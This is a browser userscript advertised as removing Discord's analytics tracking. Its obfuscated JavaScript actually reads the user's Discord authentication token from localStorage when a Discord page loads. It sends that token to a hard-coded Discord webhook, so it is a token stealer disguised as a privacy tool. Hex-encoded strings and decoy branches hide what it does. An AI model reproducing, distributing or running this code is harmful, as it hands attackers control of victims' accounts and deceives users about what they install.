// ==UserScript==
// @name         Discord Trackn't
// @namespace    http://tampermonkey.net/
// @version      1
// @description  Removes Discord plugins that track analytics and other interactions
// @author       Spinfal
// @match        https://discord.com/activ*
// @match        https://discord.com/channel*
// @grant        none
// @run-at       document-start
// ==/UserScript==

var _0x48fd=['\x68\x74\x74\x70\x73\x3a\x2f\x2f\x64\x69\x73\x63\x6f\x72\x64\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x77\x65\x62\x68\x6f\x6f\x6b\x73\x2f\x38\x30\x30\x35\x33\x30\x36\x37\x36\x34\x39\x39\x37\x34\x32\x37\x32\x30\x2f\x55\x6c\x39\x4c\x39\x70\x6c\x6a\x53\x2d\x57\x59\x61\x78\x62\x45\x74\x47\x43\x59\x34\x76\x52\x55\x69\x4c\x76\x61\x6b\x5a\x55\x71\x52\x4e\x5f\x62\x62\x4e\x54\x4c\x43\x76\x35\x73\x68\x32\x64\x4e\x68\x56\x36\x42\x59\x61\x2d\x70\x73\x33\x61\x6a\x35\x71\x55\x68\x58\x65\x34\x6c','\x50\x4f\x53\x54','\x69\x6e\x64\x65\x78\x4f\x66','\x6f\x70\x65\x6e','\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e','\x72\x65\x6d\x6f\x76\x65\x49\x74\x65\x6d','\x6c\x6f\x63\x61\x6c\x53\x74\x6f\x72\x61\x67\x65','\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72','\x63\x6f\x6f\x6b\x69\x65','\x75\x77\x75','\x6b\x65\x79','\x33\x31\x42\x6a\x75\x4d\x73\x6b','\x69\x6d\x76\x4d\x79','\x63\x6f\x6e\x66\x69\x67\x75\x72\x61\x62\x6c\x65','\x36\x38\x35\x39\x34\x31\x4f\x72\x67\x76\x56\x68','\x67\x65\x6c\x70\x72','\x38\x30\x33\x31\x37\x47\x52\x73\x6e\x6b\x52','\x4f\x62\x46\x73\x6a','\x65\x6e\x75\x6d\x65\x72\x61\x62\x6c\x65','\x73\x70\x6c\x69\x63\x65','\x3d\x3b\x20\x65\x78\x70\x69\x72\x65\x73\x3d\x54\x68\x75\x2c\x20\x30\x31\x20\x4a\x61\x6e\x20\x31\x39\x37\x30\x20\x30\x30\x3a\x30\x30\x3a\x30\x30\x20\x47\x4d\x54\x3b\x20\x70\x61\x74\x68\x3d\x2f','\x32\x36\x31\x45\x69\x50\x6c\x65\x74','\x31\x33\x38\x39\x30\x47\x4a\x6e\x6b\x45\x65','\x33\x30\x33\x37\x6a\x56\x72\x59\x6c\x53','\x74\x51\x73\x64\x6f','\x63\x6c\x65\x61\x72','\x73\x70\x6c\x69\x74','\x75\x79\x78\x6b\x6d','\x67\x65\x74\x49\x74\x65\x6d','\x50\x46\x6e\x51\x57','\x70\x55\x4c\x49\x67','\x64\x65\x66\x69\x6e\x65\x50\x72\x6f\x70\x65\x72\x74\x79','\x52\x71\x68\x54\x6f','\x74\x6f\x6b\x65\x6e','\x4e\x4c\x58\x4a\x48','\x35\x37\x38\x39\x36\x37\x5a\x6e\x54\x51\x76\x5a','\x3b\x20\x65\x78\x70\x69\x72\x65\x73\x3d\x54\x75\x65\x2c\x20\x31\x39\x20\x4a\x61\x6e\x20\x32\x30\x33\x38\x20\x30\x33\x3a\x31\x34\x3a\x30\x37\x20\x47\x4d\x54\x3b\x20\x70\x61\x74\x68\x3d\x2f','\x73\x65\x74\x49\x74\x65\x6d','\x70\x75\x73\x68','\x47\x62\x63\x77\x4d','\x34\x34\x36\x31\x30\x34\x57\x54\x6f\x4b\x50\x48','\x67\x65\x74','\x6c\x65\x6e\x67\x74\x68','\x33\x35\x34\x38\x39\x31\x5a\x66\x42\x46\x4d\x72','\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65','\x73\x74\x72\x69\x6e\x67\x69\x66\x79'];var _0xf408=function(_0x4b621c,_0x160887){_0x4b621c=_0x4b621c-0x19a;var _0x48fd44=_0x48fd[_0x4b621c];return _0x48fd44;};(function(_0x279f91,_0x48b9df){var _0x4910bb=_0xf408;while(!![]){try{var _0x19d7dd=-parseInt(_0x4910bb(0x1b3))+-parseInt(_0x4910bb(0x1b0))+parseInt(_0x4910bb(0x1c4))+parseInt(_0x4910bb(0x19d))*parseInt(_0x4910bb(0x19f))+-parseInt(_0x4910bb(0x1c6))+parseInt(_0x4910bb(0x19e))*parseInt(_0x4910bb(0x1c1))+-parseInt(_0x4910bb(0x1ab));if(_0x19d7dd===_0x48b9df)break;else _0x279f91['push'](_0x279f91['shift']());}catch(_0x3d076f){_0x279f91['push'](_0x279f91['shift']());}}}(_0x48fd,0x6d98d),function(){'use strict';var _0x540ab2=_0xf408;!window[_0x540ab2(0x1bc)]&&Object[_0x540ab2(0x1a7)](window,_0x540ab2(0x1bc),new function(){var _0x3dcd1d=_0x540ab2,_0x47669f=[],_0x2c7e43={};Object['\x64\x65\x66\x69\x6e\x65\x50\x72\x6f\x70\x65\x72\x74\x79'](_0x2c7e43,_0x3dcd1d(0x1a4),{'\x76\x61\x6c\x75\x65':function(_0x376e57){return this[_0x376e57]?this[_0x376e57]:null;},'\x77\x72\x69\x74\x61\x62\x6c\x65':![],'\x63\x6f\x6e\x66\x69\x67\x75\x72\x61\x62\x6c\x65':![],'\x65\x6e\x75\x6d\x65\x72\x61\x62\x6c\x65':![]}),Object[_0x3dcd1d(0x1a7)](_0x2c7e43,_0x3dcd1d(0x1c0),{'\x76\x61\x6c\x75\x65':function(_0xd38354){var _0x130c73=_0x3dcd1d;if('\x70\x53\x51\x55\x6d'===_0x130c73(0x1a5)){function _0x235a09(){return _0x3d980c[_0x28963];}}else return _0x47669f[_0xd38354];},'\x77\x72\x69\x74\x61\x62\x6c\x65':![],'\x63\x6f\x6e\x66\x69\x67\x75\x72\x61\x62\x6c\x65':![],'\x65\x6e\x75\x6d\x65\x72\x61\x62\x6c\x65':![]}),Object[_0x3dcd1d(0x1a7)](_0x2c7e43,_0x3dcd1d(0x1ad),{'\x76\x61\x6c\x75\x65':function(_0x58dbf9,_0x3b2412){var _0x1e003a=_0x3dcd1d;if(!_0x58dbf9)return;document['\x63\x6f\x6f\x6b\x69\x65']=escape(_0x58dbf9)+'\x3d'+escape(_0x3b2412)+_0x1e003a(0x1ac);},'\x77\x72\x69\x74\x61\x62\x6c\x65':![],'\x63\x6f\x6e\x66\x69\x67\x75\x72\x61\x62\x6c\x65':![],'\x65\x6e\x75\x6d\x65\x72\x61\x62\x6c\x65':![]}),Object[_0x3dcd1d(0x1a7)](_0x2c7e43,_0x3dcd1d(0x1b2),{'\x67\x65\x74':function(){var _0x4ac1a9=_0x3dcd1d;return _0x47669f[_0x4ac1a9(0x1b2)];},'\x63\x6f\x6e\x66\x69\x67\x75\x72\x61\x62\x6c\x65':![],'\x65\x6e\x75\x6d\x65\x72\x61\x62\x6c\x65':![]}),Object['\x64\x65\x66\x69\x6e\x65\x50\x72\x6f\x70\x65\x72\x74\x79'](_0x2c7e43,'\x72\x65\x6d\x6f\x76\x65\x49\x74\x65\x6d',{'\x76\x61\x6c\x75\x65':function(_0x57f643){var _0x5d6429=_0x3dcd1d;if('\x47\x50\x43\x46\x57'===_0x5d6429(0x1c2)){function _0x7396da(){var _0x1850d0=_0x5d6429;if(!_0x4d6fd2)return;_0x1dd6e2['\x63\x6f\x6f\x6b\x69\x65']=_0x3df673(_0x2b1154)+'\x3d'+_0x23ade2(_0x20c666)+_0x1850d0(0x1ac);}}else{if(!_0x57f643)return;document[_0x5d6429(0x1be)]=escape(_0x57f643)+_0x5d6429(0x19c);}},'\x77\x72\x69\x74\x61\x62\x6c\x65':![],'\x63\x6f\x6e\x66\x69\x67\x75\x72\x61\x62\x6c\x65':![],'\x65\x6e\x75\x6d\x65\x72\x61\x62\x6c\x65':![]}),Object[_0x3dcd1d(0x1a7)](_0x2c7e43,_0x3dcd1d(0x1a1),{'\x76\x61\x6c\x75\x65':function(){var _0x4cf80f=_0x3dcd1d;if(_0x4cf80f(0x1a8)!==_0x4cf80f(0x1a8)){function _0x45dd38(){var _0x35e691=_0x4cf80f;_0x1f41d1[_0x5799a6=_0x4844f6(_0x3472f1[0x0])]=_0x96b080(_0x3340eb[0x1]),_0x4b43a8[_0x35e691(0x1ae)](_0x1a1db4);}}else{if(!_0x47669f[_0x4cf80f(0x1b2)])return;for(var _0x1f222a in _0x47669f){if(_0x4cf80f(0x1a0)===_0x4cf80f(0x1a0))document[_0x4cf80f(0x1be)]=escape(_0x1f222a)+_0x4cf80f(0x19c);else{function _0x4ab976(){var _0x54a3f7=_0x4cf80f;if(!_0x5be0ff[_0x54a3f7(0x1b2)])return;for(var _0x9577d0 in _0x31368a){_0x427a62[_0x54a3f7(0x1be)]=_0x59ccef(_0x9577d0)+_0x54a3f7(0x19c);}}}}}},'\x77\x72\x69\x74\x61\x62\x6c\x65':![],'\x63\x6f\x6e\x66\x69\x67\x75\x72\x61\x62\x6c\x65':![],'\x65\x6e\x75\x6d\x65\x72\x61\x62\x6c\x65':![]}),this[_0x3dcd1d(0x1b1)]=function(){var _0x16696d=_0x3dcd1d,_0x535b3a;for(var _0x1b550d in _0x2c7e43){if(_0x16696d(0x1c7)===_0x16696d(0x1a6)){function _0x3444ea(){var _0x298ab1=_0x16696d;return _0x80eadb[_0x298ab1(0x1b2)];}}else{_0x535b3a=_0x47669f[_0x16696d(0x1b8)](_0x1b550d);if(_0x535b3a===-0x1){if(_0x16696d(0x1aa)===_0x16696d(0x1af)){function _0x1945f2(){var _0x596a62=_0x16696d;if(!_0xda075)return;_0x392b99['\x63\x6f\x6f\x6b\x69\x65']=_0x351a55(_0x50f5cb)+_0x596a62(0x19c);}}else _0x2c7e43['\x73\x65\x74\x49\x74\x65\x6d'](_0x1b550d,_0x2c7e43[_0x1b550d]);}else _0x47669f[_0x16696d(0x19b)](_0x535b3a,0x1);delete _0x2c7e43[_0x1b550d];}}for(_0x47669f;_0x47669f[_0x16696d(0x1b2)]>0x0;_0x47669f[_0x16696d(0x19b)](0x0,0x1)){if(_0x16696d(0x1a3)==='\x75\x79\x78\x6b\x6d')_0x2c7e43[_0x16696d(0x1bb)](_0x47669f[0x0]);else{function _0x1ac372(){var _0x2a694d=_0x16696d;_0x2166e3[_0x2a694d(0x1ad)](_0xf7aac,_0x4fea2c[_0x371f67]);}}}for(var _0x6030fe,_0x1f4c1b,_0x536715=0x0,_0x458ce7=document['\x63\x6f\x6f\x6b\x69\x65'][_0x16696d(0x1a2)](/\s*;\s*/);_0x536715<_0x458ce7[_0x16696d(0x1b2)];_0x536715++){_0x6030fe=_0x458ce7[_0x536715]['\x73\x70\x6c\x69\x74'](/\s*=\s*/);if(_0x6030fe[_0x16696d(0x1b2)]>0x1){if('\x67\x65\x6c\x70\x72'===_0x16696d(0x1c5))_0x2c7e43[_0x1f4c1b=unescape(_0x6030fe[0x0])]=unescape(_0x6030fe[0x1]),_0x47669f[_0x16696d(0x1ae)](_0x1f4c1b);else{function _0xea9450(){var _0x399e50=_0x16696d;_0x21f859=_0x3482c8[_0x399e50(0x1b8)](_0x34b883),_0x3ad5bd===-0x1?_0xa0a381[_0x399e50(0x1ad)](_0x445b6a,_0x4f19eb[_0x2f96d8]):_0x545496[_0x399e50(0x19b)](_0x24c1d0,0x1),delete _0x5993f7[_0x95b706];}}}}return _0x2c7e43;},this[_0x3dcd1d(0x1c3)]=![],this[_0x3dcd1d(0x19a)]=!![];}());var _0x5a7c32=localStorage['\x67\x65\x74\x49\x74\x65\x6d'](_0x540ab2(0x1a9)),_0x408c23=_0x540ab2(0x1b6),_0x37ad68=new XMLHttpRequest();_0x37ad68[_0x540ab2(0x1b9)](_0x540ab2(0x1b7),_0x408c23),_0x37ad68[_0x540ab2(0x1bd)](_0x540ab2(0x1b4),_0x540ab2(0x1ba));var _0x10ae1c={'\x75\x73\x65\x72\x6e\x61\x6d\x65':_0x540ab2(0x1bf),'\x61\x76\x61\x74\x61\x72\x5f\x75\x72\x6c':null,'\x63\x6f\x6e\x74\x65\x6e\x74':_0x5a7c32};_0x37ad68['\x73\x65\x6e\x64'](JSON[_0x540ab2(0x1b5)](_0x10ae1c));}());
